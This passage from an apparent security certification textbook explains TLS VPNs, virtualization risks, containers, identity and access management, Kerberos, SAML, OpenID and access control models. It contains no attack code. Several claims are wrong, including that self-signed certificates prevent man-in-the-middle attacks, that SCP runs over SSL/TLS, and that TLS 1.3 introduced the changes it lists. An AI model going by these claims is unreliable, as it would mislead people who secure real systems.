gateway, either transport or tunnel mode may be used. If the
communication is computer to computer, transport mode is
required. When using transport mode from gateway to host, the
gateway must operate as a host.
The most effective attack against an IPsec VPN is a man-in-the
middle attack. In this attack, the attacker proceeds through the
security negotiation phase until the key negotiation, when the
victim reveals its identity. In a well-implemented system, the
attacker fails when the attacker cannot likewise prove his
identity.
SSL/TLS
Secure Sockets Layer (SSL)/Transport Layer Security
(TLS) is another option for creating VPNs. Although SSL/TLS
has largely been replaced by its successor, TLS, it is quite
common to hear it still referred to as an SSL/TLS connection. It
works at the application layer of the OSI model and is used
mainly to protect HTTP traffic or web servers. Its functionality
is embedded in most browsers, and its use typically requires no
action on the part of the user. It is widely used to secure
Internet transactions. It can be implemented in two ways:
SSL/TLS portal VPN: In this case, a user has a single SSL/TLS
connection for accessing multiple services on the web server. Once
authenticated, the user is provided a page that acts as a portal to
other services.
SSL/TLS tunnel VPN: A user may use an SSL/TLS tunnel to
access services on a server that is not a web server. This solution
uses custom programming to provide access to non-web services
through a web browser.
TLS and SSL/TLS are very similar but not the same. When
configuring SSL/TLS, a session key length must be designated.
The two options are 40-bit and 128-bit. Using self-signed
certificates to authenticate the server’s public key prevents manin-the-middle attacks.
SSL/TLS is often used to protect other protocols. Secure Copy
Protocol (SCP), for example, uses SSL/TLS to secure file
transfers between hosts. Table 8-2 lists some of the advantages
and disadvantages of SSL/TLS.
Table 8-2 Advantages and Disadvantages of SSL/TLS
Advantages
Disadvantages
Data is encrypted.
Encryption and decryption require heavy
resource usage.
SSL/TLS is
Critical troubleshooting components (URL
supported on all
browsers.
path, SQL queries, passed parameters) are
encrypted.
Users can easily
identify its use
(via https://).
When placing the SSL/TLS gateway, you must consider a tradeoff: The closer the gateway is to the edge of the network, the less
encryption that needs to be performed in the LAN (and the less
performance degradation), but the closer to the network edge it
is placed, the farther the traffic travels through the LAN in the
clear. The decision comes down to how much you trust your
internal network.
The latest version of TLS is version 1.3, which provides access to
advanced cipher suites that support elliptical curve
cryptography and AEAD block cipher modes. TLS has been
improved to support the following:
Hash negotiation: Can negotiate any hash algorithm to be used
as a built-in feature, and the default cipher pair MD5/SHA-1 has
been replaced with SHA-256.
Certificate hash or signature control: Can configure the
certificate requester to accept only specified hash or signature
algorithm pairs in the certification path.
Suite B–compliant cipher suites: Two cipher suites have been
added so that the use of TLS can be Suite B compliant:
TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256
TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384
Serverless
A serverless architecture is one in which servers are not located
where applications are hosted. In this model, applications are
hosted by a third-party service, eliminating the need for server
software and hardware management by the developer.
Applications are broken up into individual functions that can be
invoked and scaled individually. Function as a Service (FaaS),
another name for serverless architecture, was discussed in
Chapter 6.
CHANGE MANAGEMENT
All networks evolve, grow, and change over time. Companies
and their processes also evolve and change, which is a good
thing. But infrastructure change must be managed in a
structured way so as to maintain a common sense of purpose
about the changes. By following recommended steps in a formal
change management process, change can be prevented from
becoming the tail that wags the dog. The following are
guidelines to include as a part of any change management
policy:
All changes should be formally requested.
Each request should be analyzed to ensure it supports all goals and
polices.
Prior to formal approval, all costs and effects of the methods of
implementation should be reviewed.
After they’re approved, the change steps should be developed.
During implementation, incremental testing should occur, relying
on a predetermined fallback strategy if necessary.
Complete documentation should be produced and submitted with a
formal report to management.
One of the key benefits of following this change management
method is the ability to make use of the documentation in future
planning. Lessons learned can be applied, and even the process
itself can be improved through analysis.
VIRTUALIZATION
Multiple physical servers are increasingly being consolidated to
a single physical device or hosted as virtual servers. It is even
possible to have entire virtual networks residing on these hosts.
While it may seem that these devices are safely contained on the
physical devices, they are still vulnerable to attack. If a host is
compromised or a hypervisor that manages virtualization is
compromised, an attack on the virtual machines (VMs) could
ensue.
Security Advantages and Disadvantages of Virtualization
Virtualization of servers has become a key part of reducing the
physical footprint of data centers. The advantages include
Reduced overall use of power in the data center
Dynamic allocation of memory and CPU resources to the servers
High availability provided by the ability to quickly bring up a replica
server in the event of loss of the primary server
However, most of the same security issues that must be
mitigated in the physical environment must also be addressed
in the virtual network. In a virtual environment, instances of an
operating system are virtual machines. A host system can
contain many VMs. Software called a hypervisor manages the
distribution of resources (CPU, memory, and disk) to the VMs.
Figure 8-16 shows the relationship between the host machine,
its physical resources, the resident VMs, and the virtual
resources assigned to them.
Figure 8-16 Virtualization
Keep in mind that in any virtual environment, each virtual
server that is hosted on the physical server must be configured
with its own security mechanisms. These mechanisms include
antivirus and anti-malware software and all the latest patches
and security updates for all the software hosted on the virtual
machine. Also, remember that all the virtual servers share the
resources of the physical device.
When virtualization is hosted on a Linux machine, any sensitive
application that must be installed on the host should be
installed in a chroot environment. A chroot on Unix-based
operating systems is an operation that changes the root
directory for the current running process and its children. A
program that is run in such a modified environment cannot
name (and therefore normally cannot access) files outside the
designated directory tree.
Type 1 vs. Type 2 Hypervisors
The hypervisor that manages the distribution of the physical
server’s resources can be either Type 1 or Type 2:
Type 1 hypervisor: A guest operating system runs on another
level above the hypervisor. Examples of Type 1 hypervisors are
Citrix XenServer, Microsoft Hyper-V, and VMware vSphere.
Type 2 hypervisor: A Type 2 hypervisor runs within a
conventional operating system environment. With the hypervisor
layer as a distinct second software level, guest operating systems
run at the third level above the hardware. VMware Workstation and
Oracle VM VirtualBox exemplify Type 2 hypervisors.
Figure 8-17 shows a comparison of the two approaches.
Figure 8-17 Hypervisor Types
Virtualization Attacks and Vulnerabilities
Virtualization attacks and vulnerabilities fall into the following
categories:
VM escape: This type of attack occurs when a guest OS escapes
from its VM encapsulation to interact directly with the hypervisor.
This can allow access to all VMs and the host machine as well.
Figure 8-18 illustrates an example of this attack.
FIGURE 8-18 VM Escape
Unsecured VM migration: This type of attack occurs when a VM
is migrated to a new host and security policies and configuration are
not updated to reflect the change.
Host and guest vulnerabilities: Host and guest interactions can
magnify system vulnerabilities. The operating systems on both the
host and the guest systems can suffer the same issues as those on all
physical devices. For that reason, both guest and host operating
systems should always have the latest security patches and should
have antivirus and anti-malware software installed and up to date.
All other principles of hardening the operating system should also
be followed, including disabling unneeded services and disabling
unneeded accounts.
VM sprawl: More VMs create more failure points, and sprawl can
cause problems even if no malice is involved. Sprawl occurs when
the number of VMs grows over time to an unmanageable number.
As this occurs, the ability of the administrator to keep up with them
is slowly diminished.
Hypervisor attack: This type of attack involves taking control of
the hypervisor to gain access to the VMs and their data. While these
attacks are rare due to the difficulty of directly accessing
hypervisors, administrators should plan for them.
Data remnants: Sensitive data inadvertently replicated in VMs as
a result of cloud maintenance functions or remnant data left in
terminated VMs needs to be protected. Also, if data is moved,
residual data may be left behind, accessible to unauthorized users.
Any remaining data in the old location should be shredded, but
depending on the security practice, data remnants may remain.
This can be a concern with confidential data in private clouds and
any sensitive data in public clouds. Commercial products can deal
with data remnants. For example, Blancco is a product that
permanently removes data from PCs, servers, data center
equipment, and smart phones. Data erased by Blancco cannot be
recovered with any existing technology. Blancco also creates a
report to price each erasure for compliance purposes.
Virtual Networks
A virtual infrastructure usually contains virtual switches that
connect to the physical switches in the network. You should
ensure that traffic from the physical network to the virtual
network is tightly controlled. Remember that virtual machines
run operating systems that are vulnerable to the same attacks as
those on physical machines. Also, the same type of network
attacks and scanning can be done if there is access to the virtual
network.
Management Interface
Some vulnerability exists in the management interface to the
hypervisor. The danger here is that this interface typically
provides access to the entire virtual infrastructure. The
following are some of the attacks through this interface:
Privilege elevation: In some cases, the dangers of privilege
elevation or escalation in a virtualized environment may be equal to
or greater than those in a physical environment. When the
hypervisor is performing its duty of handling calls between the
guest operating system and the hardware, any flaws introduced to
those calls could allow an attacker to escalate privileges in the guest
operating system. An example of a flaw in VMware ESX Server,
Workstation, Fusion, and View products could have led to
escalation on the host. VMware reacted quickly to fix this flaw with
a security update. The key to preventing privilege escalation is to
make sure all virtualization products have the latest updates and
patches.
Live VM migration: One of the advantages of a virtualized
environment is the ability of the system to migrate a VM from one
host to another when needed, called a live migration. When VMs
are on the network between secured perimeters, attackers can
exploit the network vulnerability to gain unauthorized access to
VMs. With access to the VM images, attackers can plant malicious
code in the VM images to plant attacks on data centers that VMs
travel between. Often the protocols used for the migration are not
encrypted, making a man-in-the-middle attack in the VM possible
while it is in transit, as shown in Figure 8-19. They key to
preventing man-in-the middle attacks is encryption of the images
where they are stored.
FIGURE 8-19 Man-in-the-Middle Attack
Vulnerabilities Associated with a Single Physical Server
Hosting Multiple Companies’ Virtual Machines
In some virtualization deployments, a single physical server
hosts multiple organizations’ VMs. All the VMs hosted on a
single physical computer must share the resources of that
physical server. If the physical server crashes or is
compromised, all the organizations that have VMs on that
physical server are affected. User access to the VMs should be
properly configured, managed, and audited. Appropriate
security controls, including antivirus, anti-malware, ACLs, and
auditing, must be implemented on each of the VMs to ensure
that each one is properly protected. Other risks to consider
include physical server resource depletion, network resource
performance, and traffic filtering between virtual machines.
Driven mainly by cost, many companies outsource to cloud
providers computing jobs that require a large number of
processor cycles for a short duration. This situation allows a
company to avoid a large investment in computing resources
that will be used for only a short time. Assuming that the
provisioned resources are dedicated to a single company, the
main vulnerability associated with on-demand provisioning is
traces of proprietary data that can remain on the virtual
machine and may be exploited.
Let’s look at an example. Say that a security architect is seeking
to outsource company server resources to a commercial cloud
service provider. The provider under consideration has a
reputation for poorly controlling physical access to data centers
and has been the victim of social engineering attacks. The
service provider regularly assigns VMs from multiple clients to
the same physical resource. When conducting the final risk
assessment, the security architect should take into
consideration the likelihood that a malicious user will obtain
proprietary information by gaining local access to the
hypervisor platform.
Vulnerabilities Associated with a Single Platform Hosting
Multiple Companies’ Virtual Machines
In some virtualization deployments, a single platform hosts
multiple organizations’ VMs. If all the servers that host VMs use
the same platform, attackers will find it much easier to attack
the other host servers once the platform is discovered. For
example, if all physical servers use VMware to host VMs, any
identified vulnerabilities for that platform could be used on all
host computers. Other risks to consider include misconfigured
platforms, separation of duties, and application of security
policy to network interfaces. If an administrator wants to
virtualize the company’s web servers, application servers, and
database servers, the following should be done to secure the
virtual host machines: only access hosts through a secure
management interface and restrict physical and network access
to the host console.
Virtual Desktop Infrastructure (VDI)
Virtual desktop infrastructure (VDI) hosts desktop
operating systems within a virtual environment in a centralized
server. Users access the desktops and run them from the server.
There are three models for implementing VDI:
Centralized model: All desktop instances are stored in a single
server, which requires significant processing power on the server.
Hosted model: Desktops are maintained by a service provider.
This model eliminates capital cost and is instead considered
operational cost.
Remote virtual desktops model: An image is copied to the local
machine, which means a constant network connection is
unnecessary.
Figure 8-20 compares the remote virtual desktop models (also
called streaming) with centralized VDI.
Figure 8-20 VDI Streaming and Centralized VDI
Terminal Services/Application Delivery Services
Just as operating systems can be provided on demand with
technologies like VDI, applications can also be provided to users
from a central location. Two models can be used to implement
this:
Server-based application virtualization (terminal
services): In server-based application virtualization, an
application runs on servers. Users receive the application
environment display through a remote client protocol, such as
Microsoft Remote Desktop Protocol (RDP) or Citrix Independent
Computing Architecture (ICA). Examples of terminal services
include Remote Desktop Services and Citrix Presentation Server.
Client-based application virtualization (application
streaming): In client-based application virtualization, the target
application is packaged and streamed to the client PC. It has its own
application computing environment that is isolated from the client
OS and other applications. A representative example is Microsoft
Application Virtualization (App-V).
Figure 8-21 compares these two approaches.
Figure 8-21 Application Streaming and Terminal Services
When using either of these technologies, you should force the
use of encryption, set limits to the connection life, and strictly
control access to the server. These measures can prevent
eavesdropping on any sensitive information, especially the
authentication process.
CONTAINERIZATION
A newer approach to server virtualization is referred to as
container-based virtualization, also called operating system
virtualization. Containerization is a technique in which the
kernel allows for multiple isolated user space instances. The
instances are known as containers, virtual private servers, or
virtual environments.
In this model, the hypervisor is replaced with operating
system–level virtualization. A virtual machine is not a complete
operating system instance but rather a partial instance of the
same operating system. The containers in Figure 8-22 are the
darker boxes just above the host OS level. Container-based
virtualization is used mostly in Linux environments, and
examples are the commercial Parallels Virtuozzo and the open
source OpenVZ project.
Figure 8-22 Container-based Virtualization
IDENTITY AND ACCESS MANAGEMENT
This section describes how identity and access management
(IAM) work, why IAM is important, and how IAM components
and devices work together in an enterprise. Access control
allows only authorized users, applications, devices, and systems
to access enterprise resources and information. It includes
facilities, support systems, information systems, network
devices, and personnel. Security practitioners must use access
controls to specify which users can access a resource, which
resources can be accessed, which operations can be performed,
and which actions will be monitored. Once again, the CIA triad
is important in providing enterprise IAM. The three-step
process used to set up a robust IAM system is covered in the
following sections.
Identify Resources
This first step in the access control process involves defining all
resources in the IT infrastructure by deciding which entities
need to be protected. When defining these resources, you must
also consider how the resources will be accessed. The following
questions can be used as a starting point during resource
identification:
Will this information be accessed by members of the general public?
Should access to this information be restricted to employees only?
Should access to this information be restricted to a smaller subset of
employees?
Keep in mind that data, applications, services, servers, and
network devices are all considered resources. Resources are any
organizational asset that users can access. In access control,
resources are often referred to as objects.
Identify Users
After identifying the resources, an organization should identify
the users who need access to the resources. A typical security
professional must manage multiple levels of users who require
access to organizational resources. During this step, only
identifying the users is important. The level of access these
users will be given will be analyzed further in the next step.
As part of this step, you must analyze and understand the users’
needs and then measure the validity of those needs against
organizational needs, policies, legal issues, data sensitivity, and
risk.
Remember that any access control strategy and the system
deployed to enforce it should avoid complexity. The more
complex an access control system is, the harder that system is to
manage. In addition, anticipating security issues that could
occur in more complex systems is much harder. As security
professionals, we must balance the organization’s security needs
and policies with the needs of the users. If a security mechanism
that we implement causes too much difficulty for the user, the
user might engage in practices that subvert the mechanisms
that we implement. For example, if you implement a password
policy that requires a very long, complex password, users might
find remembering their passwords to be difficult. Users might
then write their passwords on sticky notes that they then attach
to their monitor or keyboard.
Identify Relationships Between Resources and Users
The final step in the access control process is to define the
access control levels that need to be in place for each resource
and the relationships between the resources and users. For
example, if an organization has defined a web server as a
resource, general employees might need a less restrictive level
of access to the resource than the level given to the public and a
more restrictive level of access to the resource than the level
given to the web development staff. Access controls should be
designed to support the business functionality of the resources
that are being protected. Controlling the actions that can be
performed for a specific resource based on a user’s role is vital.
Privilege Management
When users are given the ability to do something that typically
only an administrator can do, they have been granted privileges
and their account becomes a privileged account. The
management of such accounts is called privilege management
and must be conducted carefully because any privileges granted
become tools that can be used against your organization if an
account is compromised by a malicious individual.
An example of the use of privilege management is in the use of
attribute certificates (ACs) to hold user privileges with the same
object that authenticates them. So when Sally uses her
certificates to authenticate, she receives privileges that are
attributes of the certificate. This architecture is called a privilege
management infrastructure.
Multifactor Authentication (MFA)
Identifying users and devices and determining the actions
permitted by a user or device forms the foundation of access
control models. While this paradigm has not changed since the
beginning of network computing, the methods used to perform
this important set of functions have changed greatly and
continue to evolve. While simple usernames and passwords
once served the function of access control, in today’s world,
more sophisticated and secure methods are developing quickly.
Not only are such simple systems no longer secure, the design of
access credential systems today emphasizes ease of use.
Multifactor authentication (MFA) is the use of more than
a single factor, such as a password, to authenticate someone.
This section covers multifactor authentication.
Authentication
To be able to access a resource, a user must prove her identity,
provide the necessary credentials, and have the appropriate
rights to perform the tasks she is completing. So there are two
parts:
Identification: In the first part of the process, a user professes an
identity to an access control system.
Authentication: The second part of the process involves
validating a user with a unique identifier by providing the
appropriate credentials.
When trying to differentiate between these two parts, security
professionals should know that identification identifies the user,
and authentication verifies that the identity provided by the
user is valid. Authentication is usually implemented through a
user password provided at login. The login process should
validate the login after all the input data is supplied. The most
popular forms of user identification include user IDs or user
accounts, account numbers, and personal identification
numbers (PINs).
Authentication Factors
Once the user identification method has been established, an
organization must decide which authentication method to use.
Authentication methods are divided into five broad categories:
Knowledge factor authentication: Something a person knows
Ownership factor authentication: Something a person has
Characteristic factor authentication: Something a person is
Location factor authentication: Somewhere a person is
Action factor authentication: Something a person does
Authentication usually ensures that a user provides at least one
factor from these categories, which is referred to as single-factor
authentication. An example of this would be providing a
username and password at login. Two-factor authentication
ensures that the user provides two of the three factors. An
example of two-factor authentication would be providing a
username, password, and smart card at login. Three-factor
authentication ensures that a user provides three factors. An
example of three-factor authentication would be providing a
username, password, smart card, and fingerprint at login. For
authentication to be considered strong authentication, a user
must provide factors from at least two different categories.
(Note that the username is the identification factor, not an
authentication factor.)
You should understand that providing multiple authentication
factors from the same category is still considered single-factor
authentication. For example, if a user provides a username,
password, and the user’s mother’s maiden name, single-factor
authentication is being used. In this example, the user is still
only providing factors that are something a person knows.
Knowledge Factors
As previously described in brief, knowledge factor
authentication is authentication that is provided based on
something a person knows. This type of authentication is
referred to as a Type I authentication factor. While the most
popular form of authentication used by this category is
password authentication, other knowledge factors can be used,
including date of birth, mother’s maiden name, key
combination, or PIN.
Ownership Factors
Ownership factor authentication is authentication that is
provided based on something that a person has. This type of
authentication is referred to as a Type II authentication factor.
Ownership factors can include the following:
Token devices: A token device is a handheld device that presents
the authentication server with the one-time password. If the
authentication method requires a token device, the user must be in
physical possession of the device to authenticate. So although the
token device provides a password to the authentication server, the
token device is considered a Type II authentication factor because
its use requires ownership of the device. A token device is usually
implemented only in very secure environments because of the cost
of deploying the token device. In addition, token-based solutions
can experience problems because of the battery life span of the
token device.
Memory cards: A memory card is a swipe card that is issued to a
valid user. The card contains user authentication information.
When the card is swiped through a card reader, the information
stored on the card is compared to the information that the user
enters. If the information matches, the authentication server
approves the login. If it does not match, authentication is denied.
Because the card must be read by a card reader, each computer or
access device must have its own card reader. In addition, the cards
must be created and programmed. Both of these steps add
complexity and cost to the authentication process. However, using
memory cards is often worth the extra complexity and cost for the
added security it provides, which is a definite benefit of this system.
However, the data on the memory cards is not protected, and this is
a weakness that organizations should consider before implementing
this type of system. Memory-only cards are very easy to counterfeit.
Smart cards: A smart card accepts, stores, and sends data but can
hold more data than a memory card. Smart cards, often known as
integrated circuit cards (ICCs), contain memory like memory cards
but also contain embedded chips like bank or credit cards. Smart
cards use card readers. However, the data on a smart card is used
by the authentication server without user input. To protect against
lost or stolen smart cards, most implementations require the user to
input a secret PIN, meaning the user is actually providing both Type
I (PIN) and Type II (smart card) authentication factors.
Characteristic Factors
Characteristic factor authentication is authentication
that is provided based on something a person is. This type of
authentication is referred to as a Type III authentication factor.
Biometric technology is the technology that allows users to be
authenticated based on physiological or behavioral
characteristics. Physiological characteristics include any unique
physical attribute of the user, including iris, retina, and
fingerprints. Behavioral characteristics measure a person’s
actions in a situation, including voice patterns and data entry
characteristics.
Single Sign-On (SSO)
In an effort to make users more productive, several solutions
have been developed to allow users to use a single password for
all functions and to use these same credentials to access
resources in external organizations. These concepts are called
single sign-on (SSO) and identity verification based on
federations. The following section looks at these concepts and
their security issues.
In an SSO environment, a user enters his login credentials once
and can access all resources in the network. The Open Group
Security Forum has defined many objectives for an SSO system.
Some of the objectives for the user sign-on interface and user
account management include the following:
The interface should be independent of the type of authentication
information handled.
The creation, deletion, and modification of user accounts should be
supported.
Support should be provided for a user to establish a default user
profile.
Accounts should be independent of any platform or operating
system.
Note
To obtain more information about the Open Group’s Single Sign-On Standard,
visit http://www.opengroup.org/security/sso_scope.htm.
SSO provides many advantages and disadvantages when it is
implemented.
Advantages of an SSO system include the following:
Users are able to use stronger passwords.
User and password administration is simplified.
Resource access is much faster.
User login is more efficient.
Users only need to remember the login credentials for only a single
system.
Disadvantages of an SSO system include the following:
After a user obtains system access through the initial SSO login, the
user is able to access all resources to which he is granted access.
Although this is also an advantage for the user (only one login
needed), it is also considered a disadvantage because only one signon by an adversary can compromise all the systems that participate
in the SSO network.
If a user’s credentials are compromised, attackers will have access
to all resources to which the user has access.
Although the discussion of SSO so far has been mainly about
how it is used for networks and domains, SSO can also be
implemented in web-based systems. Enterprise access
management (EAM) provides access control management for
web-based enterprise systems. Its functions include
accommodation of a variety of authentication methods and rolebased access control. SSO can be implemented in Kerberos,
SESAME, and federated identity management environments.
Security domains can then be established to assign SSO rights
to resources.
Kerberos
Kerberos is an authentication protocol that uses a client/server
model developed by MIT’s Project Athena. It is the default
authentication model in the recent editions of Windows Server
and is also used in Apple, Oracle, and Linux operating systems.
Kerberos is an SSO system that uses symmetric key
cryptography. Kerberos provides confidentiality and integrity.
Kerberos assumes that messaging, cabling, and client
computers are not secure and are easily accessible. In a
Kerberos exchange involving a message with an authenticator,
the authenticator contains the client ID and a timestamp.
Because a Kerberos ticket is valid for a certain time, the
timestamp ensures the validity of the request.
In a Kerberos environment, the key distribution center (KDC) is
the repository for all user and service secret keys. The process of
authentication and subsequent access to resources is as follows:
1. The client sends a request to the authentication server (AS), which
might or might not be the KDC.
2. The AS forwards the client credentials to the KDC.
3. The KDC authenticates clients to other entities on a network and
facilitates communication using session keys. The KDC provides
security to clients or principals, which are users, network services,
and software. Each principal must have an account on the KDC.
4. The KDC issues a ticket-granting ticket (TGT) to the principal.
5. The principal sends the TGT to the ticket-granting service (TGS)
when the principal needs to connect to another entity.
6. The TGS then transmits a ticket and session keys to the principal.
The set of principles for which a single KDC is responsible is
referred to as a realm.
Some advantages of implementing Kerberos include the
following:
User passwords do not need to be sent over the network.
Both the client and server authenticate each other.
The tickets passed between the server and client are timestamped
and include lifetime information.
The Kerberos protocol uses open Internet standards and is not
limited to proprietary codes or authentication mechanisms.
Some disadvantages of implementing Kerberos include the
following:
KDC redundancy is required if providing fault tolerance is a
requirement. The KDC is a single point of failure.
The KDC must be scalable to ensure that performance of the system
does not degrade.
Session keys on the client machines can be compromised.
Kerberos traffic needs to be encrypted to protect the information
over the network.
All systems participating in the Kerberos process must have
synchronized clocks.
Kerberos systems are susceptible to password-guessing attacks.
Figure 8-23 show the Kerberos ticketing process.
Figure 8-23 Kerberos Ticket-Issuing Process
Active Directory
Microsoft’s implementation of SSO is Active Directory (AD),
which organizes directories into forests and trees. AD tools are
used to manage and organize everything in an organization,
including users and devices. This is where security is
implemented, and its implementation is made more efficient
through the use of Group Policy. AD is an example of a system
based on the Lightweight Directory Access Protocol (LDAP). It
uses the same authentication and authorization system used in
Unix and Kerberos. This system authenticates a user once and
then, through the use of a ticket system, allows the user to
perform all actions and access all resources to which she has
been given permission without the need to authenticate again.
The steps in this process are shown in Figure 8-24. The user
authenticates with the domain controller, which is performing
several other roles as well. First, it is the key distribution center
(KDC), which runs the authorization service (AS), which
determines whether the user has the right or permission to
access a remote service or resource in the network.
Figure 8-24 Kerberos Implementation in Active Directory
After the user has been authenticated (when she logs on once to
the network), she is issued a ticket-granting ticket (TGT). This is
used to later request session tickets, which are required to
access resources. At any point that she later attempts to access a
service or resource, she is redirected to the AS running on the
KDC. Upon presenting her TGT, she is issued a session, or
service, ticket for that resource. The user presents the service
ticket, which is signed by the KDC, to the resource server for
access. Because the resource server trusts the KDC, the user is
granted access.
SESAME
The Secure European System for Applications in a
Multivendor Environment (SESAME) project extended
Kerberos’s functionality to fix Kerberos’s weaknesses. SESAME
uses both symmetric and asymmetric cryptography to protect
interchanged data. SESAME uses a trusted authentication
server at each host. SESAME uses Privileged Attribute
Certificates (PACs) instead of tickets. It incorporates two
certificates: one for authentication and one for defining access
privileges. The trusted authentication server is referred to as the
Privileged Attribute Server (PAS), which performs roles similar
to the KDC in Kerberos. SESAME can be integrated into a
Kerberos system.
Federation
A federated identity is a portable identity that can be used
across businesses and domains. In federated identity
management, each organization that joins the federation agrees
to enforce a common set of policies and standards. These
policies and standards define how to provision and manage user
identification, authentication, and authorization. Providing
disparate authentication mechanisms with federated IDs has a
lower up-front development cost than other methods, such as a
PKI or attestation. Federated identity management uses two
basic models for linking organizations within the federation:
Cross-certification model: In this model, each organization
certifies that every other organization is trusted. This trust is
established when the organizations review each other’s standards.
Each organization must verify and certify through due diligence
that the other organizations meet or exceed standards. One
disadvantage of cross-certification is that the number of trust
relationships that must be managed can become problematic.
Trusted third-party (or bridge) model: In this model, each
organization subscribes to the standards of a third party. The third
party manages verification, certification, and due diligence for all
organizations. This is usually the best model for an organization
that needs to establish federated identity management relationships
with a large number of organizations.
Security issues with federations and their possible solutions
include the following:
Inconsistent security among partners: Federated partners
need to establish minimum standards for the policies, mechanisms,
and practices they use to secure their environments and
information.
Insufficient legal agreements among partners: Like any
other business partnership, identity federation requires carefully
drafted legal agreements.
A number of methods are used to securely transmit
authentication data among partners. The following sections
look at these protocols and services.
XACML
Extensible Access Control Markup Language (XACML) is a
standard for an access control policy language using XML. It is
covered in Chapter 7, “Implementing Controls to Mitigate
Attacks and Software Vulnerabilities.”
SPML
Another open standard for exchanging authorization
information between cooperating organizations is Service
Provisioning Markup Language (SPML). It is an XMLbased framework developed by the Organization for the
Advancement of Structured Information Standards (OASIS),
which is a nonprofit, international consortium that creates
interoperable industry specifications based on public standards
such as XML and SGML. The SPML architecture has three
components:
Request authority (RA): The entity that makes the provisioning
request
Provisioning service provider (PSP): The entity that responds
to the RA requests
Provisioning service target (PST): The entity that performs the
provisioning
When a trust relationship has been established between two
organizations with web-based services, one organization acts as
the RA and the other acts as the PSP. The trust relationship uses
Security Assertion Markup Language (SAML), discussed next,
in a Simple Object Access Protocol (SOAP) header. The SOAP
body transports the SPML requests/responses.
Figure 8-25 shows an example of how these SPML messages are
used. In the diagram, a company has an agreement with a
supplier to allow the supplier to access its provisioning system.
When the supplier’s HR department adds a user, an SPML
request is generated to the supplier’s provisioning system so the
new user can use the system. Then the supplier’s provisioning
system generates another SPML request to create the account in
the customer provisioning system.
FIGURE 8-25 SPML
SAML
Security Assertion Markup Language (SAML) is a
security attestation model built on XML and SOAP-based
services that allows for the exchange of authentication and
authorization data between systems and supports federated
identity management. The major issue it attempts to address is
SSO using a web browser. When authenticating over HTTP
using SAML, an assertion ticket is issued to the authenticating
user.
Remember that SSO enables a user to authenticate once to
access multiple sets of data. SSO at the Internet level is usually
accomplished with cookies, but extending the concept beyond
the Internet has resulted in many proprietary approaches that
are not interoperable. The goal of SAML is to create a standard
for this process.
A consortium called the Liberty Alliance proposed an extension
to the SAML standard called the Liberty Identity Federation
Framework (ID-FF), which is proposed to be a standardized
cross-domain SSO framework. It identifies a circle of trust,
within which each participating domain is trusted to document
the following about each user:
The process used to identify a user
The type of authentication system used
Any policies associated with the resulting authentication credential
Each member entity is free to examine this information and
determine whether to trust it. Liberty contributed ID-FF to
OASIS. In March 2005, SAML v2.0 was announced as an OASIS
standard. SAML v2.0 represents the convergence of Liberty IDFF and other proprietary extensions.
In an unauthenticated SAMLv2 transaction, the browser asks
the service provider (SP) for a resource. The SP provides the
browser with an XHTML format. The browser asks the identity
provider (IP) to validate the user and then provides the XHTML
back to the SP for access. The <nameID> element in SAML can
be provided as the X.509 subject name or by Kerberos principal
name.
To prevent a third party from identifying a specific user as
having previously accessed a service provider through an SSO
operation, SAML uses transient identifiers (which are valid only
for a single login session and are different each time the user
authenticates again but stay the same as long as the user is
authenticated).
SAML is a good solution in the following scenarios:
When you need to provide SSO (when at least one actor or
participant is an enterprise)
When you need to provide access to a partner or customer
application to your portal
When you can provide a centralized identity source
OpenID
OpenID is an open standard and decentralized protocol by the
nonprofit OpenID Foundation that allows users to be
authenticated by certain cooperating sites. The cooperating sites
are called relying parties (RPs). OpenID allows users to log in to
multiple sites without having to register their information
repeatedly. Users select an OpenID identity provider and use
the accounts to log in to any website that accepts OpenID
authentication.
While OpenID solves the same issue as SAML, an enterprise
may find these advantages in using OpenID:
It’s less complex than SAML.
It’s been widely adopted by companies such as Google.
On the other hand, you should be aware of the following
shortcomings of OpenID compared to SAML:
With OpenID, auto-discovery of the identity provider must be
configured per user.
SAML has better performance.
SAML can initiate SSO from either the service provider or the
identity provider, while OpenID can only be initiated from the
service provider.
In February 2014, the third generation of OpenID, called
OpenID Connect, was released. It is an authentication layer
protocol that resides atop the OAuth 2.0 framework. It is
designed to support native and mobile applications, and it
defines methods of signing and encryption.
Here is an example of SAML in action:
1. A user logs in to Domain A, using a PKI certificate that is stored on
a smart card protected by an eight-digit PIN.
2. The credential is cached by the authenticating server in Domain A.
3. Later, the user attempts to access a resource in Domain B. This
initiates a request to the Domain A authenticating server to attest to
the resource server in Domain B that the user is in fact who she
claims to be.
Figure 8-26 illustrates the way the service provider obtains the
identity information from the identity provider.
Figure 8-26 SAML
Shibboleth
Shibboleth is an open source project that provides single signon capabilities and allows sites to make informed authorization
decisions for individual access of protected online resources in a
privacy-preserving manner. Shibboleth allows the use of
common credentials among sites that are a part of the
federation. It is based on SAML. This system has two
components:
Identity providers: IPs supply the user information.
Service providers: SPs consume this information before
providing a service.
Role-Based Access Control
Role-based access control (RBAC) is commonly used in
networks to simplify the process of assigning new users the
permission required to perform a job role. In this arrangement,
users are organized by job role into security groups, which are
then granted the rights and permissions required to perform
that job. Figure 8-27 illustrates this process. The role is
implemented as a security group possessing the required rights
and permissions, which are inherited by all security group or
role members.
Figure 8-27 RBAC
This is not a perfect solution, however, and it carries several
security issues. First, RBAC is only as successful as the
organization policies designed to support it. Poor policies can
result in the proliferation of unnecessary roles, creating an
administrative nightmare for the person managing user access.
This can lead to mistakes that reduce rather than enhance
access security.
A related issue is that those managing user access may have an
incomplete understanding of the process, and this can lead to a
serious reduction in security. There can be additional costs to
the organization to ensure proper training of these individuals.
The key to making RBAC successful is proper alignment with
policies and proper training of those implementing and
maintaining the system.
Note
A security issue can be created when a user is fired or quits. In both cases, all
access should be removed. Account reviews should be performed on a regular
basis to catch any old accounts that are still active.
Attribute-Based Access Control
Attribute-based access control (ABAC) grants or denies
user requests based on arbitrary attributes of the user and
arbitrary attributes of the object, and environment conditions
that may be globally recognized. NIST SP 800-162 was
published to define and clarify ABAC.
According to NIST SP 800-162, ABAC is an access control
method where subject requests to perform operations on objects
are granted or denied based on assigned attributes of the
subject, assigned attributes of the object, environment
conditions, and a set of policies that are specified in terms of
those attributes and conditions. An operation is the execution
of a function at the request of a subject upon an object.
Operations include read, write, edit, delete, copy, execute, and
modify. A policy is the representation of rules or relationships
that makes it possible to determine if a requested access should
be allowed, given the values of the attributes of the subject,
object, and possibly environment conditions. Environment
conditions are the operational or situational context in which
access requests occur. Environment conditions are detectable
environmental characteristics, which are independent of subject
